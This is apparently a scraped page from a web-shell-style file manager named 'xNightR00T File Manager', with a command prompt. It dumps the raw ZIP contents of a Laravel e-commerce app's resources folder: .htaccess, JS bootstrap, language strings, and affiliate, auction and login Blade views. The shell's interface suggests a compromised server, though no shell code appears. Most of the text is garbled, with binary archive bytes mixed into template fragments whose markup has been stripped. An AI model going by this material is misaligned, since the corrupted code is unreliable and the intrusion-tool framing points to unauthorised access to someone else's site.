xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
PK�N]�Z� .DS_Storenu�[���Bud1 comp �jslg1Scomp �jsmoDDblob%V��AjsmodDblob%V��Ajsph1Scomp0langlg1Scomp'�langmoDDblob%V��AlangmodDblob%V��Alangph1Scomp`sasslg1Scomp[sassmoDDblob%V��AsassmodDblob%V��Asassph1Scomp viewslg1ScompW�}viewsmoDDblob���AviewsmodDblob���Aviewsph1Scompkp  @� @� @� @ E DSDB `� @� @� @PK�N]5�8��� .editorconfignu�[���root = true [*] charset = utf-8 end_of_line = lf insert_final_newline = true indent_style = space indent_size = 4 trim_trailing_whitespace = true [*.md] trim_trailing_whitespace = false [*.yml] indent_size = 2 PK�N] ���� .htaccessnu�[��� Options -MultiViews -Indexes RewriteEngine On # Handle Authorization Header RewriteCond %{HTTP:Authorization} . RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] # Redirect Trailing Slashes If Not A Folder... RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} (.+)/$ RewriteRule ^ %1 [L,R=301] # Handle Front Controller... RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^ index.php [L] # Disable index view Options -Indexes # Hide a specific file Order allow,deny Deny from all PK�N]�Km;�� js/app.jsnu�[��� /** * First we will load all of this project's JavaScript dependencies which * includes Vue and other libraries. It is a great starting point when * building robust, powerful web applications using Vue and Laravel. */ require('./bootstrap'); window.Vue = require('vue'); /** * Next, we will create a fresh Vue application instance and attach it to * the page. Then, you may begin adding components to this application * or customize the JavaScript scaffolding to fit your unique needs. */ Vue.component('example-component', require('./components/ExampleComponent.vue')); const app = new Vue({ el: '#app' }); PK�N]�?-mjs/bootstrap.jsnu�[��� window._ = require('lodash'); window.Popper = require('popper.js').default; /** * We'll load jQuery and the Bootstrap jQuery plugin which provides support * for JavaScript based Bootstrap features such as modals and tabs. This * code may be modified to fit the specific needs of your application. */ try { window.$ = window.jQuery = require('jquery'); require('bootstrap'); } catch (e) {} /** * We'll load the axios HTTP library which allows us to easily issue requests * to our Laravel back-end. This library automatically handles sending the * CSRF token as a header based on the value of the "XSRF" token cookie. */ window.axios = require('axios'); window.axios.defaults.headers.common['X-Requested-With'] = 'XMLHttpRequest'; /** * Next we will register the CSRF Token as a common header with Axios so that * all outgoing HTTP requests automatically have it attached. This is just * a simple convenience so we don't have to attach every token manually. */ let token = document.head.querySelector('meta[name="csrf-token"]'); if (token) { window.axios.defaults.headers.common['X-CSRF-TOKEN'] = token.content; } else { console.error('CSRF token not found: https://laravel.com/docs/csrf#csrf-x-csrf-token'); } /** * Echo exposes an expressive API for subscribing to channels and listening * for events that are broadcast by Laravel. Echo and event broadcasting * allows your team to easily build robust real-time web applications. */ // import Echo from 'laravel-echo' // window.Pusher = require('pusher-js'); // window.Echo = new Echo({ // broadcaster: 'pusher', // key: process.env.MIX_PUSHER_APP_KEY, // cluster: process.env.MIX_PUSHER_APP_CLUSTER, // encrypted: true // }); PK�N]۔��LL"js/components/ExampleComponent.vuenu�[��� PK�N]�M�n||lang/en/auth.phpnu�[��� 'These credentials do not match our records.', 'throttle' => 'Too many login attempts. Please try again in :seconds seconds.', ]; PK�N]}�s�lang/en/pagination.phpnu�[��� '« Previous', 'next' => 'Next »', ]; PK�N]��y((lang/en/passwords.phpnu�[��� 'Passwords must be at least six characters and match the confirmation.', 'reset' => 'Your password has been reset!', 'sent' => 'We have e-mailed your password reset link!', 'token' => 'This password reset token is invalid.', 'user' => "We can't find a user with that e-mail address.", ]; PK�N]��- - lang/en/validation.phpnu�[��� 'The :attribute must be accepted.', 'active_url' => 'The :attribute is not a valid URL.', 'after' => 'The :attribute must be a date after :date.', 'after_or_equal' => 'The :attribute must be a date after or equal to :date.', 'alpha' => 'The :attribute may only contain letters.', 'alpha_dash' => 'The :attribute may only contain letters, numbers, dashes and underscores.', 'alpha_num' => 'The :attribute may only contain letters and numbers.', 'array' => 'The :attribute must be an array.', 'before' => 'The :attribute must be a date before :date.', 'before_or_equal' => 'The :attribute must be a date before or equal to :date.', 'between' => [ 'numeric' => 'The :attribute must be between :min and :max.', 'file' => 'The :attribute must be between :min and :max kilobytes.', 'string' => 'The :attribute must be between :min and :max characters.', 'array' => 'The :attribute must have between :min and :max items.', ], 'boolean' => 'The :attribute field must be true or false.', 'confirmed' => 'The :attribute confirmation does not match.', 'date' => 'The :attribute is not a valid date.', 'date_format' => 'The :attribute does not match the format :format.', 'different' => 'The :attribute and :other must be different.', 'digits' => 'The :attribute must be :digits digits.', 'digits_between' => 'The :attribute must be between :min and :max digits.', 'dimensions' => 'The :attribute has invalid image dimensions.', 'distinct' => 'The :attribute field has a duplicate value.', 'email' => 'The :attribute must be a valid email address.', 'exists' => 'The selected :attribute is invalid.', 'file' => 'The :attribute must be a file.', 'filled' => 'The :attribute field must have a value.', 'gt' => [ 'numeric' => 'The :attribute must be greater than :value.', 'file' => 'The :attribute must be greater than :value kilobytes.', 'string' => 'The :attribute must be greater than :value characters.', 'array' => 'The :attribute must have more than :value items.', ], 'gte' => [ 'numeric' => 'The :attribute must be greater than or equal :value.', 'file' => 'The :attribute must be greater than or equal :value kilobytes.', 'string' => 'The :attribute must be greater than or equal :value characters.', 'array' => 'The :attribute must have :value items or more.', ], 'image' => 'The :attribute must be an image.', 'in' => 'The selected :attribute is invalid.', 'in_array' => 'The :attribute field does not exist in :other.', 'integer' => 'The :attribute must be an integer.', 'ip' => 'The :attribute must be a valid IP address.', 'ipv4' => 'The :attribute must be a valid IPv4 address.', 'ipv6' => 'The :attribute must be a valid IPv6 address.', 'json' => 'The :attribute must be a valid JSON string.', 'lt' => [ 'numeric' => 'The :attribute must be less than :value.', 'file' => 'The :attribute must be less than :value kilobytes.', 'string' => 'The :attribute must be less than :value characters.', 'array' => 'The :attribute must have less than :value items.', ], 'lte' => [ 'numeric' => 'The :attribute must be less than or equal :value.', 'file' => 'The :attribute must be less than or equal :value kilobytes.', 'string' => 'The :attribute must be less than or equal :value characters.', 'array' => 'The :attribute must not have more than :value items.', ], 'max' => [ 'numeric' => 'The :attribute may not be greater than :max.', 'file' => 'The :attribute may not be greater than :max kilobytes.', 'string' => 'The :attribute may not be greater than :max characters.', 'array' => 'The :attribute may not have more than :max items.', ], 'mimes' => 'The :attribute must be a file of type: :values.', 'mimetypes' => 'The :attribute must be a file of type: :values.', 'min' => [ 'numeric' => 'The :attribute must be at least :min.', 'file' => 'The :attribute must be at least :min kilobytes.', 'string' => 'The :attribute must be at least :min characters.', 'array' => 'The :attribute must have at least :min items.', ], 'not_in' => 'The selected :attribute is invalid.', 'not_regex' => 'The :attribute format is invalid.', 'numeric' => 'The :attribute must be a number.', 'present' => 'The :attribute field must be present.', 'regex' => 'The :attribute format is invalid.', 'required' => 'The :attribute field is required.', 'required_if' => 'The :attribute field is required when :other is :value.', 'required_unless' => 'The :attribute field is required unless :other is in :values.', 'required_with' => 'The :attribute field is required when :values is present.', 'required_with_all' => 'The :attribute field is required when :values is present.', 'required_without' => 'The :attribute field is required when :values is not present.', 'required_without_all' => 'The :attribute field is required when none of :values are present.', 'same' => 'The :attribute and :other must match.', 'size' => [ 'numeric' => 'The :attribute must be :size.', 'file' => 'The :attribute must be :size kilobytes.', 'string' => 'The :attribute must be :size characters.', 'array' => 'The :attribute must contain :size items.', ], 'string' => 'The :attribute must be a string.', 'timezone' => 'The :attribute must be a valid zone.', 'unique' => 'The :attribute has already been taken.', 'uploaded' => 'The :attribute failed to upload.', 'url' => 'The :attribute format is invalid.', /* |-------------------------------------------------------------------------- | Custom Validation Language Lines |-------------------------------------------------------------------------- | | Here you may specify custom validation messages for attributes using the | convention "attribute.rule" to name the lines. This makes it quick to | specify a specific custom language line for a given attribute rule. | */ 'custom' => [ 'attribute-name' => [ 'rule-name' => 'custom-message', ], ], /* |-------------------------------------------------------------------------- | Custom Validation Attributes |-------------------------------------------------------------------------- | | The following language lines are used to swap attribute place-holders | with something more reader friendly such as E-Mail Address instead | of "email". This simply helps us make messages a little cleaner. | */ 'attributes' => [], ]; PK�N],��A   sass/app.scssnu�[��� // Fonts @import url('https://fonts.googleapis.com/css?family=Nunito'); // Variables @import 'variables'; // Bootstrap @import '~bootstrap/scss/bootstrap'; .navbar-laravel { background-color: #fff; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.04); } PK�N] +�LRRsass/_variables.scssnu�[��� // Body $body-bg: #f8fafc; // Typography $font-family-sans-serif: "Nunito", sans-serif; $font-size-base: 0.9rem; $line-height-base: 1.6; // Colors $blue: #3490dc; $indigo: #6574cd; $purple: #9561e2; $pink: #f66D9b; $red: #e3342f; $orange: #f6993f; $yellow: #ffed4a; $green: #38c172; $teal: #4dc0b5; $cyan: #6cb2eb; PK�N]���i((views/.DS_Storenu�[���Bud1   <ionlg1Sco  @� @� @� @<auctionlg1ScompauctionmoDDblob%V��AauctionmodDblob%V��Aauctionph1Scompauthlg1ScompG�authmoDDblob%V��AauthmodDblob%V��Aauthph1Scomppbackendlg1Scomp�backendmoDDblob&V��AbackendmodDblob&V��Abackendph1Scomp%� categorieslg1Scomp� categoriesmoDDblob&V��A categoriesmodDblob&V��A categoriesph1Scomp componentslg1Scomp5x componentsmoDDblob&V��A componentsmodDblob&V��A componentsph1Scomp@emailslg1Scomp`emailsmoDDblob&V��AemailsmodDblob&V��Aemailsph1Scomp�errorslg1Scomp#errorsmoDDblob&V��AerrorsmodDblob&V��Aerrorsph1Scomp@frontendlg1Scomp�-frontendmoDDblob'V��AfrontendmodDblob'V��Afrontendph1Scomp� installationlg1Scomp?' installationmoDDblob'V��A installationmodDblob'V��A installationph1Scomp�modalslg1Scomp�modalsmoDDblob'V��AmodalsmodDblob'V��Amodalsph1ScompPpartialslg1Scomp_�partialsmoDDblob'V��ApartialsmodDblob'V��Apartialsph1Scomp�preorderlg1Scomp�preordermoDDblob'V��ApreordermodDblob'V��Apreorderph1Scomp�sellerlg1Scomp��sellermoDDblob'V��AsellermodDblob'V��Asellerph1Scomp�updatelg1Scomp��updatemoDDblob'V��AupdatemodDblob'V��Aupdateph1Scomp�uploaderlg1Scomp�uploadermoDDblob'V��AuploadermodDblob'V��Auploaderph1Scomp E DSDB `�(0@� @� @stallationmodDblob'V��A installationph1Scomp�modalslg1Scomp�modalsmoDDblob'V��AmodalsmodDblob'V��Amodalsph1ScompPpartialslg1Scomp_�partialsmoDDblob'V��ApartialsmodDblob'V��Apartialsph1Scomp�preorderlg1Scomp�preordermoDDblob'V��ApreordermodDblob'V��Apreorderph1Scomp�sellerlg1Scomp��sellermoDDblob'V��AsellermodDblob'V��Asellerph1Scomp�updatelg1Scomp��updatemoDDblob'V��AupdatemodDblob'V��AupPK�N]X�*�  (views/affiliate/affiliate_logs.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Affiliate Logs')}}
@foreach($affiliate_logs as $key => $affiliate_log) @if ($affiliate_log->user != null) @endif @endforeach
# {{ translate('Referred By')}} {{ translate('Referral User')}} {{ translate('Amount')}} {{ translate('Order Id')}} {{ translate('Referral Type') }} {{ translate('Product') }} {{ translate('Date') }}
{{ ($key+1) + ($affiliate_logs->currentPage() - 1)*$affiliate_logs->perPage() }} {{ optional(\App\Models\User::where('id', $affiliate_log->referred_by_user)->first())->name }} @if($affiliate_log->user_id !== null) {{ optional($affiliate_log->user)->name }} @else {{ translate('Guest').' ('. $affiliate_log->guest_id.')' }} @endif {{ single_price($affiliate_log->amount) }} @if($affiliate_log->order_id != null) {{ optional($affiliate_log->order)->code }} @else {{ optional($affiliate_log->order_detail->order)->code }} @endif {{ ucwords(str_replace('_',' ', $affiliate_log->affiliate_type)) }} @if($affiliate_log->order_detail_id != null && $affiliate_log->order_detail) {{ optional($affiliate_log->order_detail->product)->name }} @endif {{ $affiliate_log->created_at->format('d, F Y') }}
{{ $affiliate_logs->links() }}
@endsection PK�N]lt��2views/affiliate/affiliate_withdraw_modal.blade.phpnu�[���
@csrf
PK�N]�h����5views/affiliate/affiliate_withdraw_requests.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Affiliate Withdraw Request')}}
@foreach($affiliate_withdraw_requests as $key => $affiliate_withdraw_request) @php $status = $affiliate_withdraw_request->status ; @endphp @if ($affiliate_withdraw_request->user != null) @endif @endforeach
# {{translate('Date')}} {{translate('Name')}} {{translate('Email')}} {{translate('Amount')}} {{translate('Status')}} {{translate('options')}}
{{ ($key+1) + ($affiliate_withdraw_requests->currentPage() - 1)*$affiliate_withdraw_requests->perPage() }} {{ $affiliate_withdraw_request->created_at}} {{ optional($affiliate_withdraw_request->user)->name}} {{ optional($affiliate_withdraw_request->user)->email}} {{ single_price($affiliate_withdraw_request->amount)}} @if($status == 1) {{translate('Approved')}} @elseif($status == 2) {{translate('Rejected')}} @else {{translate('Pending')}} @endif @if($status == 0) @can('accept_affiliate_withdraw_requests') @endcan @can('reject_affiliate_withdraw_request') @endcan @else {{ translate('No Action Available')}} @endif
{{ $affiliate_withdraw_requests->links() }}
@endsection @section('modal') @endsection @section('script') @endsection PK�N]lF��T%T%!views/affiliate/configs.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Affiliate Registration Form')}}
@csrf
@foreach (json_decode(\App\Models\AffiliateConfig::where('type', 'verification_form')->first()->value) as $key => $element) @if ($element->type == 'text' || $element->type == 'file')
@elseif ($element->type == 'select' || $element->type == 'multi_select' || $element->type == 'radio')
@if (is_array(json_decode($element->options))) @foreach (json_decode($element->options) as $value)
@endforeach @endif
@endif @endforeach
  • {{translate('Text Input')}}
  • {{translate('Select')}}
  • {{translate('Multiple Select')}}
  • {{translate('Radio')}}
  • {{translate('File')}}
@endsection @section('script') @endsection PK�N]��?L�6�66views/affiliate/frontend/apply_for_affiliate.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

{{ translate('Affiliate Informations') }}

@csrf @if (!Auth::check())
{{translate('User Info')}}
@endif
{{translate('Verification info')}}
@php $verification_form = get_Affiliate_onfig_value(); @endphp @foreach (json_decode($verification_form) as $key => $element) @if ($element->type == 'text')
@elseif($element->type == 'file')
@elseif ($element->type == 'select' && is_array(json_decode($element->options)))
@elseif ($element->type == 'multi_select' && is_array(json_decode($element->options)))
@elseif ($element->type == 'radio')
@foreach (json_decode($element->options) as $value)
@endforeach
@endif @endforeach
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_affiliate_apply') == 1) @if ($errors->has('g-recaptcha-response'))
{{ $errors->first('g-recaptcha-response') }}
@endif @endif
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_affiliate_apply') == 1) @endif @endsectionPK�N][�I^�T�T(views/affiliate/frontend/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
@include('frontend.inc.user_side_nav')

{{ translate('Affiliate') }}

{{ translate('Affiliate Balance') }}
{{ single_price(Auth::user()->affiliate_user->balance) }}
{{ translate('Affiliate Withdraw Request') }}
@if (addon_is_activated('affiliate_system') && get_affliate_purchase_option_status())
@php if (Auth::user()->referral_code == null) { Auth::user()->referral_code = substr(Auth::user()->id . Str::random(), 0, 10); Auth::user()->save(); } $referral_code = Auth::user()->referral_code; $referral_code_url = URL::to('/users/registration') . "?referral_code=$referral_code"; @endphp
@endif
{{ translate('Affiliate Earning History') }}
@foreach ($affiliate_logs as $key => $affiliate_log) @endforeach
# {{ translate('Referral User') }} {{ translate('Amount') }} {{ translate('Order Id') }} {{ translate('Referral Type') }} {{ translate('Product') }} {{ translate('Date') }}
{{ sprintf('%02d', $key + 1 + ($affiliate_logs->currentPage() - 1) * $affiliate_logs->perPage()) }} @if ($affiliate_log->user_id !== null) {{ $affiliate_log->user->name }} @else {{ translate('Guest') . ' (' . $affiliate_log->guest_id . ')' }} @endif {{ single_price($affiliate_log->amount) }} @if ($affiliate_log->order != null) {{ $affiliate_log->order->code }} @else {{ $affiliate_log->order_detail != null ?? $affiliate_log->order_detail->order->code }} @endif {{ ucwords(str_replace('_', ' ', $affiliate_log->affiliate_type)) }} @if ($affiliate_log->order_detail_id != null) @php $url = $affiliate_log->order_detail != null ?? ($affiliate_log->order_detail->product->auction_product == 1 ? route('auction-product', $affiliate_log->order_detail->product->slug) : route('product', $affiliate_log->order_detail->product->slug)); @endphp {{ $affiliate_log->order_detail != null ?? $affiliate_log->order_detail->product->name }} @endif {{ $affiliate_log->created_at->format('d-m-Y') }}
{{ $affiliate_logs->links() }}
@endsection @section('modal') @endsection @section('script') @endsection PK�N]F���"�"2views/affiliate/frontend/payment_history.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
@include('frontend.inc.user_side_nav')

{{ translate('Affiliate') }}

{{ translate('Affiliate Balance') }}
{{ single_price(Auth::user()->affiliate_user->balance) }}
{{ translate('Affiliate Withdraw Request') }}
{{ translate('Affiliate payment history')}}
@foreach ($affiliate_payments as $key => $affiliate_payment) @endforeach
# {{ translate('Date') }} {{translate('Amount')}} {{translate('Payment Method')}}
{{ sprintf('%02d', $key+1) }} {{ date('d-m-Y', strtotime($affiliate_payment->created_at)) }} {{ single_price($affiliate_payment->amount) }} {{ ucfirst(str_replace('_', ' ', $affiliate_payment ->payment_method)) }}
{{ $affiliate_payments->links() }}
@endsection @section('modal') @endsection @section('script') @endsection PK�N]b<�@ @ 3views/affiliate/frontend/payment_settings.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
@include('frontend.inc.user_side_nav')

{{ translate('Affiliate') }}

{{ translate('Payment Settings')}}
@csrf
@endsection PK�N]4�ǣ$�$;views/affiliate/frontend/withdraw_request_history.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
@include('frontend.inc.user_side_nav')

{{ translate('Affiliate') }}

{{ translate('Affiliate Balance') }}
{{ single_price(Auth::user()->affiliate_user->balance) }}
{{ translate('Affiliate Withdraw Request') }}
{{ translate('Affiliate withdraw request history')}}
@foreach ($affiliate_withdraw_requests as $key => $affiliate_withdraw_request) @endforeach
# {{ translate('Date') }} {{ translate('Amount')}} {{ translate('Status')}}
{{ sprintf('%02d', $key+1) }} {{ date('d-m-Y', strtotime($affiliate_withdraw_request->created_at)) }} {{ single_price($affiliate_withdraw_request->amount) }} @if($affiliate_withdraw_request->status == 1) {{translate('Approved')}} @elseif($affiliate_withdraw_request->status == 2) {{translate('Rejected')}} @else {{translate('Pending')}} @endif
{{ $affiliate_withdraw_requests->links() }}
@endsection @section('modal') @endsection @section('script') @endsection PK�N]�XF:�=�=views/affiliate/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Affiliate withdrow request')}}
@csrf @php $minimum_affiliate_withdraw_info = \App\Models\AffiliateConfig::where('type', 'minimum_affiliate_withdraw_amount')->first(); $minimum_affiliate_withdraw_amount = ''; if($minimum_affiliate_withdraw_info) { $minimum_affiliate_withdraw_amount = $minimum_affiliate_withdraw_info->value; } @endphp

{{ translate('Affiliate Link Validatin Time (Days)')}}

@csrf @php $validation_time_info = \App\Models\AffiliateConfig::where('type', 'validation_time')->first(); $validation_time = ''; if($validation_time_info) { $validation_time = $validation_time_info->value; } @endphp
Days
{{ translate('Basic Affiliate')}}
@csrf
@php if(\App\Models\AffiliateOption::where('type', 'user_registration_first_purchase')->first() != null){ $percentage = \App\Models\AffiliateOption::where('type', 'user_registration_first_purchase')->first()->percentage; $status = \App\Models\AffiliateOption::where('type', 'user_registration_first_purchase')->first()->status; } else { $percentage = null; } @endphp

{{ translate('Product Sharing Affiliate')}}

@csrf
@php if(\App\Models\AffiliateOption::where('type', 'product_sharing')->first() != null && \App\Models\AffiliateOption::where('type', 'product_sharing')->first()->details != null){ $commission_product_sharing = json_decode(\App\Models\AffiliateOption::where('type', 'product_sharing')->first()->details)->commission; $commission_type_product_sharing = json_decode(\App\Models\AffiliateOption::where('type', 'product_sharing')->first()->details)->commission_type; $status = \App\Models\AffiliateOption::where('type', 'product_sharing')->first()->status; } else { $commission_product_sharing = null; $commission_type_product_sharing = null; } @endphp

{{ translate('Product Sharing Affiliate (Category Wise)')}}

@csrf @php if(\App\Models\AffiliateOption::where('type', 'category_wise_affiliate')->first() != null){ $category_wise_affiliate_status = \App\Models\AffiliateOption::where('type', 'category_wise_affiliate')->first()->status; } @endphp
@if (\App\Models\AffiliateOption::where('type', 'category_wise_affiliate')->first() != null) @foreach (\App\Models\Category::all() as $key => $category) @php $found = false; @endphp @if(\App\Models\AffiliateOption::where('type', 'category_wise_affiliate')->first()->details != null) @foreach (json_decode(\App\Models\AffiliateOption::where('type', 'category_wise_affiliate')->first()->details) as $key => $data) @if($data->category_id == $category->id) @php $found = true; $value = $data; @endphp @endif @endforeach @endif @if ($found)
@else
@endif @endforeach @endif
{{ translate('N:B: You cannot enable Single Product Sharing Affiliate and Category Wise Affiliate at a time.') }}
@endsection PK�N]H���zz)views/affiliate/payment_history.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Affiliate payments of ').$affiliate_user->user->name }}
@foreach($affiliate_payments as $key => $payment) @endforeach
# {{ translate('Date')}} {{ translate('Amount')}} {{ translate('Payment Method') }}
{{ $key+1 }} {{ $payment->created_at }} {{ single_price($payment->amount) }} {{ ucfirst($payment->payment_method) }}
@endsection PK�N]!^E� � 'views/affiliate/payment_modal.blade.phpnu�[���
@csrf
PK�N] �^^(views/affiliate/refferal_users.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Refferal Users')}}
@foreach($refferal_users as $key => $refferal_user) @if ($refferal_user != null) @endif @endforeach
# {{ translate('Name')}} {{ translate('Phone')}} {{ translate('Email Address')}} {{ translate('Reffered By')}}
{{ ($key+1) + ($refferal_users->currentPage() - 1)*$refferal_users->perPage() }} {{$refferal_user->name}} {{$refferal_user->phone}} {{$refferal_user->email}} @if (\App\Models\User::find($refferal_user->referred_by) != null) {{ \App\Models\User::find($refferal_user->referred_by)->name }} ({{ \App\Models\User::find($refferal_user->referred_by)->email }}) @endif
{{ $refferal_users->appends(request()->input())->links() }}
@endsection PK�N]�e��� � 3views/affiliate/show_verification_request.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Affiliate User Verification')}}
{{ translate('User Info') }}

{{ translate('Name') }} : {{ $affiliate_user->user->name }}

{{translate('Email')}} {{ $affiliate_user->user->email }}

{{translate('Address')}} {{ $affiliate_user->user->address }}

{{translate('Phone')}} {{ $affiliate_user->user->phone }}

{{ translate('Verification Info') }}
@foreach (json_decode($affiliate_user->informations) as $key => $info) @if ($info->type == 'text' || $info->type == 'select' || $info->type == 'radio') @elseif ($info->type == 'multi_select') @elseif ($info->type == 'file') @endif @endforeach
{{ $info->label }}{{ $info->value }} {{ implode(', ', json_decode($info->value)) }} {{ translate('Click here')}}
@endsection PK�N]��싞�views/affiliate/users.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Affiliate Users')}}
@foreach($affiliate_users as $key => $affiliate_user) @if($affiliate_user->user != null) @endif @endforeach
# {{ translate('Name')}} {{ translate('Phone')}} {{ translate('Email Address')}} {{ translate('Verification Info')}} {{ translate('Approval')}} {{ translate('Due Amount') }} {{ translate('Options')}}
{{ ($key+1) + ($affiliate_users->currentPage() - 1)*$affiliate_users->perPage() }} {{$affiliate_user->user->name}} {{$affiliate_user->user->phone}} {{$affiliate_user->user->email}} @if ($affiliate_user->informations != null) {{translate('Show')}} @endif @if ($affiliate_user->balance >= 0) {{ single_price($affiliate_user->balance) }} @endif @can('pay_to_affiliate_user') @endcan @can('affiliate_users_payment_history') @endcan
{{ $affiliate_users->appends(request()->input())->links() }}
@endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]������>views/auction/frontend/nexa/auction_products_section.blade.phpnu�[���
{{ translate('Auction') }}
@php $auction_title_sub_text = get_setting('auction_title_sub_text', null); @endphp {{ $auction_title_sub_text }}
{{ translate('View All') }}
@php $products = get_auction_products(); @endphp
PK�N]zO����&views/auth/boxed/admin_login.blade.phpnu�[���
{{ translate('Admin Login Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Welcome to') }} {{ env('APP_NAME') }}

{{ translate('Login to your account')}}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_admin_login') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if (env("DEMO_MODE") == "On")
[email protected] 123456
@endif
PK�N]E$�##4views/auth/boxed/customer_reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_mail_verification') == 1) @endif @endsection PK�N]��J7views/auth/boxed/customer_verify_confirmation.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if($customerVerification->email != null)
@else
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection PK�N]� :|��*views/auth/boxed/forgot_password.blade.phpnu�[���
{{ translate('Forgot Password Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Forgot password?') }}

{{ addon_is_activated('otp_system') ? translate('Enter your email address or phone number to recover your password.') : translate('Enter your email address to recover your password.') }}
@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_forgot_password') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
PK�N]z!�##+views/auth/boxed/reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @endif @endsection PK�N]�KK)views/auth/boxed/reset_password.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Password Reset Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Reset Password') }}

{{ translate('Enter your email address and new password and confirm password.') }}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if ($errors->has('code')) {{ $errors->first('code') }} @endif
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@endsectionPK�N] ��))'views/auth/boxed/seller_login.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Seller Login Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Welcome Back !')}}

{{ translate('Login To Your Seller Account')}}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_login') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if (env("DEMO_MODE") == "On")
{{ translate('Seller Account')}}
@endif

{{ translate('Dont have an account?')}} {{ translate('Register Now')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_login') == 1) @endif @endsectionPK�N]��{eC3C3.views/auth/boxed/seller_registration.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Register your shop')}}

@csrf
{{ translate('Personal Info')}}
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if ($errors->has('phone')) {{ $errors->first('phone') }} @endif
{{ translate('Password must contain at least 6 digits') }}
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
{{ translate('Basic Info')}}
@if ($errors->has('shop_name')) {{ $errors->first('shop_name') }} @endif
@if ($errors->has('address')) {{ $errors->first('address') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_register') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_register') == 1) @endif @endsectionPK�N]�$�c�"�"2views/auth/boxed/seller_reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
